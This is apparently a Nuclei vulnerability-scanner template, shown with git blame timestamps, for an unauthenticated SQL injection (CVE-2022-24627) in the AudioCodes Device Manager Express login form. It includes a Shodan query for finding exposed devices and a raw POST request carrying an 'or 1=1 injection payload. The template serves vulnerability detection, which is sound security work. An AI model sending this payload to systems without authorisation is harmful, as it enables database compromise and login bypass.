nuclei-templates/http/cves/2022/CVE-2022-24627.yaml

58 lines
1.7 KiB
YAML
Raw Normal View History

id: CVE-2022-24627
2023-06-12 00:40:38 +00:00
info:
name: AudioCodes Device Manager Express - SQL Injection
author: geeknik
severity: critical
2024-04-16 09:16:06 +00:00
description: |
An issue was discovered in AudioCodes Device Manager Express through 7.8.20002.47752. It is an unauthenticated SQL injection in the p parameter of the process_login.php login form.
2023-06-14 16:28:05 +00:00
reference:
- https://seclists.org/fulldisclosure/2023/Feb/12
- https://nvd.nist.gov/vuln/detail/CVE-2022-24627
2024-04-16 10:06:04 +00:00
- https://github.com/tr3ss/newclei
2023-06-14 16:28:05 +00:00
classification:
2024-04-16 09:16:06 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-24627
2024-04-16 09:16:06 +00:00
cwe-id: CWE-89
2024-04-16 10:06:04 +00:00
epss-score: 0.00109
epss-percentile: 0.43163
2024-04-16 09:16:06 +00:00
cpe: cpe:2.3:a:audiocodes:device_manager_express:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: audiocodes
product: device_manager_express
2024-04-16 10:06:04 +00:00
shodan-query: title:"Audiocodes"
tags: cve,cve2022,seclists,sqli,audiocodes
2023-06-12 00:40:38 +00:00
2024-04-16 09:16:06 +00:00
flow: http(1) && http(2)
2023-06-12 00:40:38 +00:00
http:
2024-04-16 09:16:06 +00:00
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "audiocodes</title>")'
internal: true
- raw:
- |
POST /admin/AudioCodes_files/process_login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin&password=&domain=&p=%5C%27or+1%3D1%23
2023-06-12 00:40:38 +00:00
matchers:
- type: word
part: body
words:
- "SQL syntax"
- "mysql_fetch"
- "You have an error in your SQL syntax"
condition: or
# digest: 4b0a00483046022100961135146cb72e5ec123441fa9ff5dac7ec092b87f38888f1877ff1a5aa84f1c0221009e345921fc3a9094d5fd253bed1e6361bfae6d60ab6455dcfdafe7658a132668:922c64590222798bb761d5b6d8e72950